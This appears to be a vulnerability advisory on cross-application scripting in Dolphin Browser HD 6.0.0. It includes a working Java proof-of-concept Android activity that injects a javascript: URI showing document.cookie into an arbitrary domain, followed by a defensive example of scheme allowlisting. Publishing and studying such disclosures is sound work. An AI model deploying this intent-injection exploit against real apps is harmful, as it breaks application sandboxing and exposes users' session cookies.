
Dolphin Browser HD Cross-Application Scripting

Aleph Research Advisory

Identifier

Severity

High

Product

Dolphin Browser HD

Vulnerable Version

Version 6.0.0

Mitigation

Install version 6.1.0 or later.

Technical Details

A third-party application may abuse Dolphin Browser HD's URL loading process to inject JavaScript code into an arbitrary domain, thus breaking Android's application sandboxing. This is done by sending two consecutive startActivity calls. The first call carries the attacked domain and causes Dolphin Browser HD to load it; the second call carries a JavaScript URI. The JavaScript URI is opened in the current tab, i.e. in the context of the attacked domain.

Proof-of-Concept

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class CasExploit extends Activity
{
    // Explicit component of Dolphin Browser HD's browser activity.
    static final String mPackage = "mobi.mgeek.TunnyBrowser";
    static final String mClass = "BrowserActivity";
    // Origin loaded by the first intent.
    static final String mUrl = "http://target.domain/";
    // Script carried by the second intent; it runs in the tab opened for mUrl.
    static final String mJavascript = "alert(document.cookie)";
    // Delay giving the browser time to finish loading the first page.
    static final int mSleep = 15000;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        // First startActivity call: the browser opens the target domain.
        startBrowserActivity(mUrl);

        try {
            Thread.sleep(mSleep);
        } catch (InterruptedException e) {}

        // Second startActivity call: the javascript: URI is loaded into the current tab.
        startBrowserActivity("javascript:" + mJavascript);
    }

    private void startBrowserActivity(String url) {
        Intent res = new Intent("android.intent.action.VIEW");
        res.setComponent(new ComponentName(mPackage, mPackage + "." + mClass));
        res.setData(Uri.parse(url));
        startActivity(res);
    }
}
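As an added illustration of the defensive side (not Dolphin's code; the advisory does not say how version 6.1.0 fixed the issue), a hypothetical browser activity that treats every incoming VIEW intent as untrusted: the scheme is checked against an allowlist before anything is loaded, so a javascript: URI from another application is dropped, and accepted URLs go into a fresh tab rather than the current one. HardenedBrowserActivity, ALLOWED_SCHEMES and openInNewTab are assumed names.

```java
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import java.util.Arrays;
import java.util.List;
import java.util.Locale;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical hardened browser activity; the names here are assumptions, not Dolphin's code.
public class HardenedBrowserActivity extends Activity {
    // Only web schemes are accepted from other applications; javascript: is never on the list.
    private static final List<String> ALLOWED_SCHEMES = Arrays.asList("http", "https");
    // RFC 3986 scheme syntax anchored at the start: leading whitespace or control
    // characters smuggled in front of the scheme cause the match to fail.
    private static final Pattern SCHEME = Pattern.compile("^([A-Za-z][A-Za-z0-9+.-]*):");

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        handleExternalIntent(getIntent());
    }

    @Override
    protected void onNewIntent(Intent intent) {
        // A second startActivity call against an already running instance lands here.
        super.onNewIntent(intent);
        handleExternalIntent(intent);
    }

    private void handleExternalIntent(Intent intent) {
        String url = externalUrlOrNull(intent);
        // Accepted URLs always open in a fresh tab, never the current one, so an
        // external request cannot attach itself to an origin that is already open.
        if (url != null) openInNewTab(url);
    }

    /** Returns the URL if its scheme is on the allowlist, otherwise null (request dropped). */
    static String externalUrlOrNull(Intent intent) {
        if (intent == null || !Intent.ACTION_VIEW.equals(intent.getAction())) return null;
        String raw = intent.getDataString();
        if (raw == null) return null;
        Matcher m = SCHEME.matcher(raw);
        if (!m.find()) return null; // no scheme, or a malformed one
        String scheme = m.group(1).toLowerCase(Locale.ROOT); // "JavaScript:" is still rejected
        return ALLOWED_SCHEMES.contains(scheme) ? raw : null;
    }

    private void openInNewTab(String url) { /* assumed hook into the browser's tab manager */ }
}
```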

Timeline

Credit

External References